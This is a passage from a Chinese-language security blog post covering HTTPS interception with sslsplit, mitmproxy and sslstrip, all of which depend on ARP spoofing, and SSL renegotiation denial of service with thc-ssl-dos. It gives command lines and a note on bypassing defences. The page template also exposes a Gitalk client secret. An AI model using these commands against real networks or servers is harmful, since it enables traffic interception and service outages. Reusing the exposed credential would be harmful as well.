iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --toport 8080</code></pre><p>Mitmproxy和sslsplit类似,也需要先执行ARP欺骗,且有个BUG,iptables端口只能转发8080有效<br>     mitmproxy -T –host -w mitmproxy.log</p>
<h4 id="SSLstrip"><a href="#SSLstrip" class="headerlink" title="SSLstrip"></a><strong>SSLstrip</strong></h4><p>与前两种工具不同,将客户端到中间人之间的流量变为明文<br>一样也需要结合ARP欺骗<br>    <code>sslstrip -l 8080</code></p>
<blockquote>
<h3 id="SSL-TLS拒绝服务攻击"><a href="#SSL-TLS拒绝服务攻击" class="headerlink" title="SSL/TLS拒绝服务攻击"></a><strong>SSL/TLS拒绝服务攻击</strong></h3></blockquote>
<ul>
<li>thc-ssl-dos<br>SSL协商加密对性能开销增加,大量握手请求会导致拒绝服务<br>利用SSL secure Renegotiation特性,在单一TCP连接中生成数千个SSL重连接请求,造成服务器资源过载<br>与流量式拒绝服务攻击不同,thc-ssl-dos可以利用dsl线路打垮30G带宽的服务器<br>服务器平均可以处理300次/秒SSL握手请求<br>对SMTPS,POP3S等服务同样有效<br><code>thc-ssl-dos 1.1.1.1 443 -accept</code></li>
</ul>
<p>对策<br>禁用SSL-Renegotiation,使用SSL Accelerator<br>通过修改thc-ssl-dos代码,可以绕过以上对策    </p>

</article>
<ol class="animated rollIn hannah-toc"><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#SSLsplit"><span class="animated rollIn hannah-toc-text">SSLsplit</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#启动路由"><span class="animated rollIn hannah-toc-text">启动路由</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#Iptables端口转发规则"><span class="animated rollIn hannah-toc-text">Iptables端口转发规则</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#ARP欺骗"><span class="animated rollIn hannah-toc-text">ARP欺骗</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#启动SSLsplit"><span class="animated rollIn hannah-toc-text">启动SSLsplit</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#Mitmproxy"><span class="animated rollIn hannah-toc-text">Mitmproxy</span></a></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-4"><a class="animated rollIn hannah-toc-link" href="#SSLstrip"><span class="animated rollIn hannah-toc-text">SSLstrip</span></a></li></ol></li><li class="animated rollIn hannah-toc-item animated rollIn hannah-toc-level-3"><a class="animated rollIn hannah-toc-link" href="#SSL-TLS拒绝服务攻击"><span class="animated rollIn hannah-toc-text">SSL&#x2F;TLS拒绝服务攻击</span></a>
<div class="animated bounceInDown paginations">
    <div class="col-md-8 col-md-push-2 col-xs-12">
        <nav>
            
            <a href="/2014/05/21/Web_Attacks/AJAX%E6%8A%80%E6%9C%AF%E7%BB%84%E5%90%88%E5%8F%8AWebService%E5%AE%89%E5%85%A8%E8%80%83%E8%99%91/" class="prev col-md-2 col-xs-4 text-left">&larr; Prev</a>
            
            <span
                class="page-content col-md-8  col-xs-4 text-center">
                
            </span>
            
            <a href="/2014/05/18/Web_Attacks/HTTPS%E6%BC%8F%E6%B4%9E%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/" class="next col-md-2 col-xs-4 text-right">Next &rarr;</a>
            
        </nav>
        <div>
            <div class="col-md-6 col-xs-6 text-left">
                
                AJAX技术组合及WebService安全考虑
                
            </div>
            <div class="col-md-6 col-xs-6 text-right">
                
                HTTPS漏洞及攻击方法
                
            </div>
        </div>
    </div>
</div>

            <!--end body-->
            <!--begin comments-->
            
<div class="comments">
    

    
    
<div id="gitalk-container">
</div>
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script>
    var loadJs = function (d, a) {
        var c = document.getElementsByTagName("head")[0] || document.head || document
            .documentElement;
        var b = document.createElement("script");
        b.setAttribute("type", "text/javascript");
        b.setAttribute("src", d);
        if (typeof a === "function") {
            if (window.attachEvent) {
                b.onreadystatechange = function () {
                    var e = b.readyState;
                    if (e === "loaded" || e === "complete") {
                        b.onreadystatechange = null;
                        a()
                    }
                }
            } else {
                b.onload = a
            }
        }
        c.appendChild(b)
    };
    loadJs("https://unpkg.com/gitalk/dist/gitalk.min.js", function () {
        var gitalk = new Gitalk({
            clientID: 'e82b50d554e32a851ae7',
            clientSecret: '95923aeaddb44e6de22d088703c6bbde978f505c',
            repo: 'iseanhe.github.io',
            owner: 'iseanhe',
            admin: ['iseanhe'],
            id: decodeURIComponent(location.pathname),
            distractionFreeMode: false
        })

        gitalk.render('gitalk-container')
    });
</script>

</div>


            <!--end comments-->
        </div>
    </div>

    <!--begin footer-->
    <footer id="footer" class="footer animated fadeInUp hide">
    <p><i class="copy">&copy;</i> 2020 <a href="http://c.cat.plus">Cat</a> All Right Reserved.</p>
    <p>Powered by <a href="http://hexo.io" target="_blank" rel="external nofollow noopener">Hexo</a>. Theme by <a href="https://github.com/objectyan/hexo-theme-hannah" target="_blank" rel="external nofollow noopener">hannah</a></p>
</footer>
    <!--end footer-->

    
    <!-- scripts list from theme config.yml -->
    
    <script src="/js/hannah.js"></script>
    
    
    <!--begin analytics-->
    

    <!--end analytics-->
</body>
<!--end body-->
<!--begin canvas-nest-->
<script>
    var nesturl = "https://unpkg.com/canvas-nest.js/dist/canvas-nest.js";
    var c = document.getElementsByTagName("body")[0] || document.body || document.documentElement;
    var b = document.createElement("script");
    b.setAttribute("type", "text/javascript");
    b.setAttribute("src", nesturl);
    b.setAttribute("color",
        `${ Math.floor(Math.random()*256)},${ Math.floor(Math.random()*256)},${ Math.floor(Math.random()*256)}`);
    b.setAttribute("opacity", Math.random());
    b.setAttribute("count", parseInt((Math.random() * 500) || 99));
    c.appendChild(b)
</script>
<!--end canvas-nest-->

</html>